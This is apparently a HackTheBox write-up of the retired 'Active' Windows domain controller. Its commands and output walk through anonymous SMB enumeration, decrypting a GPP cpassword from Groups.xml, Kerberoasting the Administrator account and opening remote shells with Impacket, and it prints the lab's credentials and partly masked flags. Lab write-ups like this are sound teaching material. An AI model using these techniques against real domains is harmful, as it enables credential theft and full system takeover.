Active HackTheBox Writeup

5 minute read

image

Active is an easy rated windows machine on hackthebox by eks and mrb3n. Groups.xml was found on a smb mount containing the encrypted credentials for a account of which the decrypting keys were public. So, the cipher was decrypted and the password was valid for the account. Administrator account was kerberoastable whose hash was cracked to get root on the machine.

Nmap

Initial Scan

# Nmap 7.80 scan initiated Sun Jul  4 09:48:35 2021 as: nmap -sC -sV -oN nmap/initial -v 10.10.10.100
Increasing send delay for 10.10.10.100 from 0 to 5 due to 258 out of 858 dropped probes since last increase.
Nmap scan report for 10.10.10.100
Host is up (0.096s latency).
Not shown: 983 closed ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-07-04 04:03:53Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-07-04T04:04:50
|_  start_date: 2021-07-03T18:25:00

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul  4 09:51:56 2021 -- 1 IP address (1 host up) scanned in 201.76 seconds
  • We can see a lot of ports open.
  • Since, dns(53), kerberos(88) and ldap(389) is open, we can assume that the machine might be a active directory domain controller.
  • We also get a domain name : active.htb, which we will add to our hosts file.

Checking SMB on Port 445

is anonymous login enabled?

[email protected]:~/Documents/htb/retired/active$ smbclient -N -L 10.10.10.100
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Replication     Disk      
        SYSVOL          Disk      Logon server share 
        Users           Disk      
SMB1 disabled -- no workgroup available
  • It is enabled and we can see the shares.
  • Among all of the shares, Replication is not a default one. So let us check if we have a read permission on that share.

Checking if Replication share is readable

[email protected]:~/Documents/htb/retired/active$ smbclient -N //active.htb/Replication
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> 

We get a smb shell.

Listing the contents of Replication share

smb: \> dir
  .                                   D        0  Sat Jul 21 16:22:44 2018
  ..                                  D        0  Sat Jul 21 16:22:44 2018
  active.htb                          D        0  Sat Jul 21 16:22:44 2018

                10459647 blocks of size 4096. 5727630 blocks available
				
smb: \active.htb\> dir
  .                                   D        0  Sat Jul 21 16:22:44 2018
  ..                                  D        0  Sat Jul 21 16:22:44 2018
  DfsrPrivate                       DHS        0  Sat Jul 21 16:22:44 2018
  Policies                            D        0  Sat Jul 21 16:22:44 2018
  scripts                             D        0  Thu Jul 19 00:33:57 2018

                10459647 blocks of size 4096. 5727630 blocks available
smb: \active.htb\> 

Listing the file contents recursively

smb: \active.htb\> recurse ON 
smb: \active.htb\> dir 

First I turn on the recurse option, and if i do dir, it will list all the files and folder recursively. image Among all of the files, Groups.xml looks interesting.

Reading this article, I found that this file contains the password for the local users which is used to replicate across the different devices on the domain and is encrypted using AES. Also the key for decryption was made public by the microsoft which means we can easily decrypt the hash and get the password.

Downloading and reading the content

smb: \> get \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml (1.2 KiloBytes/sec) (average 1.2 KiloBytes/sec)
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
  • We get a username and a hash.
  • SVC_TGS:edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

Decrypting the hash

To decrypt we need encryption key and an IV. image From this repo, I got the key, IV and the mode of AES encryption.

Using cyberchef to decrypt the hash

image We get the password for the svc_tgs.

Checking if the creds are valid

[email protected]:~/Documents/htb/retired/active$ cme smb active.htb -u user -p pass 
SMB         10.10.10.100    445    DC               [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] active.htb\svc_tgs:GPPstillStandingStrong2k18 

We have valid creds.

Listing the shares

image Doesnot look like we can do much with it. We can read few default shares and the Replication share.

Checking if there are any kerberoastable users

  • Those accounts which have their Service Principal Name(SPN) set are kerberoastable. Usually these accounts are service accounts.
  • For kerberoastable account, we can request a TGS and some portion of data inside this TGS is encrypted with the NTLM hash of the service account which we can try and crack offline.
  • To request for TGS, we must have a valid account on the domain.

Since we have a valid account on the domain, we can request for the TGS, if there are any accounts associated with the services.

image We do have a account and we get the hash back.

Trying to crack the hash using hashcat

image And we can see that the hash cracks successfully.

Testing the account with cme

[email protected]:~/Documents/htb/retired/active$ cme smb active.htb -u administrator -p Ticketmaster1968
SMB         10.10.10.100    445    DC               [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] active.htb\administrator:Ticketmaster1968 (Pwn3d!)
  • It says pwned so it means that we can get a shell.
  • we can use wmiexec or smbexec to get a shell.
  • The difference is that we get a shell as administrator with smbexec whereas nt authority\system as wmiexec.

Getting a shell as system

[email protected]:~/Documents/htb/retired/active$ smbexec.py active.htb/administrator:[email protected]
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system

Shell as administrator

[email protected]:~/Documents/htb/retired/active$ wmiexec.py active.htb/administrator:[email protected]
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] SMBv2.1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
active\administrator

Reading flags

user.txt

C:\Windows\system32>type c:\users\svc_tgs\desktop\user.txt
86d67*********aa4d10159e983

root.txt

C:\Windows\system32>type c:\users\administrator\desktop\root.txt
b5fc76d**********54d0f708b